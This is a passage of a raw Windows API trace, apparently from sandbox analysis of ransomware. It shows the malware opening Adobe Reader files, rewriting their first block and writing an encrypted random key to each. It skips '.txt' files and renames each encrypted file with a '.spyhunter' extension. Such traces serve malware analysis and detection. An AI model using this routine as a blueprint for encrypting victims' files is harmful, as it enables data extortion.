[0118.909] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0118.909] GetProcessHeap () returned 0x2c0000 [0118.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.910] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.910] WriteFile (in: hFile=0x120, lpBuffer=0x57f8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x57f8ec*, lpNumberOfBytesWritten=0x57f8ac*=0x4, lpOverlapped=0x0) returned 1 [0118.989] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8ac*=0x30, lpOverlapped=0x0) returned 1 [0118.989] CloseHandle (hObject=0x120) returned 1 [0118.989] GetProcessHeap () returned 0x2c0000 [0118.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0118.992] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api.spyhunter") returned 84 [0118.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api.spyhunter")) returned 1 [0118.995] GetProcessHeap () returned 0x2c0000 [0118.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0118.995] GetProcessHeap () returned 0x2c0000 [0118.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0118.995] GetProcessHeap () returned 0x2c0000 [0118.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44448 | out: hHeap=0x2c0000) returned 1 [0118.995] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8f0 | out: pbBuffer=0x57f8f0) returned 1 [0118.995] GetProcessHeap () returned 0x2c0000 [0118.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0118.995] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8e8*=0x30) returned 1 [0118.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvsoft.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0119.022] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d") returned 74 [0119.022] StrStrW (lpFirst="drvSOFT.x3d", lpSrch=".txt") returned 0x0 [0119.023] GetProcessHeap () returned 0x2c0000 [0119.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.023] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0119.130] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.130] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0119.131] GetProcessHeap () returned 0x2c0000 [0119.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.131] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.131] WriteFile (in: hFile=0x16c, lpBuffer=0x57f8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x57f8ec*, lpNumberOfBytesWritten=0x57f8ac*=0x4, lpOverlapped=0x0) returned 1 [0119.160] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8ac*=0x30, lpOverlapped=0x0) returned 1 [0119.160] CloseHandle (hObject=0x16c) returned 1 [0119.160] GetProcessHeap () returned 0x2c0000 [0119.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.160] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d.spyhunter") returned 84 [0119.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvsoft.x3d"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvsoft.x3d.spyhunter")) returned 1 [0119.161] GetProcessHeap () returned 0x2c0000 [0119.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.161] GetProcessHeap () returned 0x2c0000 [0119.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0119.161] GetProcessHeap () returned 0x2c0000 [0119.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e447c8 | out: hHeap=0x2c0000) returned 1 [0119.161] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8e8 | out: pbBuffer=0x57f8e8) returned 1 [0119.161] GetProcessHeap () returned 0x2c0000 [0119.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0119.161] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8e0*=0x30) returned 1 [0119.162] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\dexshare.spi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0119.162] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi") returned 73 [0119.162] StrStrW (lpFirst="DEXShare.spi", lpSrch=".txt") returned 0x0 [0119.162] GetProcessHeap () returned 0x2c0000 [0119.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.163] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0119.175] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.176] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0119.176] GetProcessHeap () returned 0x2c0000 [0119.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.176] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.176] WriteFile (in: hFile=0x16c, lpBuffer=0x57f8e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x57f8e4*, lpNumberOfBytesWritten=0x57f8a4*=0x4, lpOverlapped=0x0) returned 1 [0119.199] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8a4*=0x30, lpOverlapped=0x0) returned 1 [0119.199] CloseHandle (hObject=0x16c) returned 1 [0119.199] GetProcessHeap () returned 0x2c0000 [0119.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.199] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi.spyhunter") returned 83 [0119.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\dexshare.spi"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\dexshare.spi.spyhunter")) returned 1 [0119.466] GetProcessHeap () returned 0x2c0000 [0119.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.466] GetProcessHeap () returned 0x2c0000 [0119.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0119.466] GetProcessHeap () returned 0x2c0000 [0119.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e438e8 | out: hHeap=0x2c0000) returned 1 [0119.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8e8 | out: pbBuffer=0x57f8e8) returned 1 [0119.467] GetProcessHeap () returned 0x2c0000 [0119.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0119.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8e0*=0x30) returned 1 [0119.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.687] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm") returned 56 [0119.687] StrStrW (lpFirst="ReadMeK.htm", lpSrch=".txt") returned 0x0 [0119.687] GetProcessHeap () returned 0x2c0000 [0119.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.688] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0119.766] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.767] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0119.767] GetProcessHeap () returned 0x2c0000 [0119.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.767] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.767] WriteFile (in: hFile=0xf4, lpBuffer=0x57f8e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x57f8e4*, lpNumberOfBytesWritten=0x57f8a4*=0x4, lpOverlapped=0x0) returned 1 [0119.768] WriteFile (in: hFile=0xf4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8a4*=0x30, lpOverlapped=0x0) returned 1 [0119.768] CloseHandle (hObject=0xf4) returned 1 [0119.768] GetProcessHeap () returned 0x2c0000 [0119.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.768] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.spyhunter") returned 66 [0119.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm.spyhunter")) returned 1 [0119.769] GetProcessHeap () returned 0x2c0000 [0119.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.769] GetProcessHeap () returned 0x2c0000 [0119.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0119.769] GetProcessHeap () returned 0x2c0000 [0119.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f340 | out: hHeap=0x2c0000) returned 1 [0119.769] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8e0 | out: pbBuffer=0x57f8e0) returned 1 [0119.769] GetProcessHeap () returned 0x2c0000 [0119.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0119.769] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8d8*=0x30) returned 1 [0119.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobeheitistd-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.770] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf") returned 87 [0119.770] StrStrW (lpFirst="AdobeHeitiStd-Regular.otf", lpSrch=".txt") returned 0x0 [0119.770] GetProcessHeap () returned 0x2c0000 [0119.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.770] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f89c*=0x2800, lpOverlapped=0x0) returned 1 [0119.905] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.905] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f89c*=0x2800, lpOverlapped=0x0) returned 1 [0119.905] GetProcessHeap () returned 0x2c0000 [0119.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.905] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.905] WriteFile (in: hFile=0xf4, lpBuffer=0x57f8dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f89c, lpOverlapped=0x0 | out: lpBuffer=0x57f8dc*, lpNumberOfBytesWritten=0x57f89c*=0x4, lpOverlapped=0x0) returned 1 [0119.958] WriteFile (in: hFile=0xf4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f89c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f89c*=0x30, lpOverlapped=0x0) returned 1 [0119.958] CloseHandle (hObject=0xf4) returned 1 [0119.958] GetProcessHeap () returned 0x2c0000 [0119.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0119.958] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf.spyhunter") returned 97 [0119.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobeheitistd-regular.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobeheitistd-regular.otf.spyhunter")) returned 1 [0119.959] GetProcessHeap () returned 0x2c0000 [0119.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0119.959] GetProcessHeap () returned 0x2c0000 [0119.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0119.959] GetProcessHeap () returned 0x2c0000 [0119.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b1e0 | out: hHeap=0x2c0000) returned 1 [0119.960] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8d8 | out: pbBuffer=0x57f8d8) returned 1 [0119.960] GetProcessHeap () returned 0x2c0000 [0119.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0119.960] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8d0*=0x30) returned 1 [0119.960] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.961] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm") returned 75 [0119.961] StrStrW (lpFirst="zy______.pfm", lpSrch=".txt") returned 0x0 [0119.961] GetProcessHeap () returned 0x2c0000 [0119.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.961] ReadFile (in: hFile=0xf4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f894*=0x2ac, lpOverlapped=0x0) returned 1 [0119.962] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffd54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.962] WriteFile (in: hFile=0xf4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f894*=0x2ac, lpOverlapped=0x0) returned 1 [0119.962] GetProcessHeap () returned 0x2c0000 [0119.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.962] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.962] WriteFile (in: hFile=0xf4, lpBuffer=0x57f8d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x57f8d4*, lpNumberOfBytesWritten=0x57f894*=0x4, lpOverlapped=0x0) returned 1 [0119.962] WriteFile (in: hFile=0xf4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f894*=0x30, lpOverlapped=0x0) returned 1 [0119.962] CloseHandle (hObject=0xf4) returned 1 [0119.962] GetProcessHeap () returned 0x2c0000 [0119.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0119.963] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm.spyhunter") returned 85 [0119.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm.spyhunter")) returned 1 [0120.075] GetProcessHeap () returned 0x2c0000 [0120.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0120.075] GetProcessHeap () returned 0x2c0000 [0120.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.075] GetProcessHeap () returned 0x2c0000 [0120.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63cc0 | out: hHeap=0x2c0000) returned 1 [0120.075] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8d8 | out: pbBuffer=0x57f8d8) returned 1 [0120.075] GetProcessHeap () returned 0x2c0000 [0120.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.075] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8d0*=0x30) returned 1 [0120.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0120.076] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf") returned 75 [0120.076] StrStrW (lpFirst="MyriadPro-It.otf", lpSrch=".txt") returned 0x0 [0120.076] GetProcessHeap () returned 0x2c0000 [0120.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0120.076] ReadFile (in: hFile=0xf4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f894*=0x2800, lpOverlapped=0x0) returned 1 [0120.133] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.133] WriteFile (in: hFile=0xf4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f894*=0x2800, lpOverlapped=0x0) returned 1 [0120.134] GetProcessHeap () returned 0x2c0000 [0120.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0120.134] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.134] WriteFile (in: hFile=0xf4, lpBuffer=0x57f8d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x57f8d4*, lpNumberOfBytesWritten=0x57f894*=0x4, lpOverlapped=0x0) returned 1 [0120.143] WriteFile (in: hFile=0xf4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f894, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f894*=0x30, lpOverlapped=0x0) returned 1 [0120.143] CloseHandle (hObject=0xf4) returned 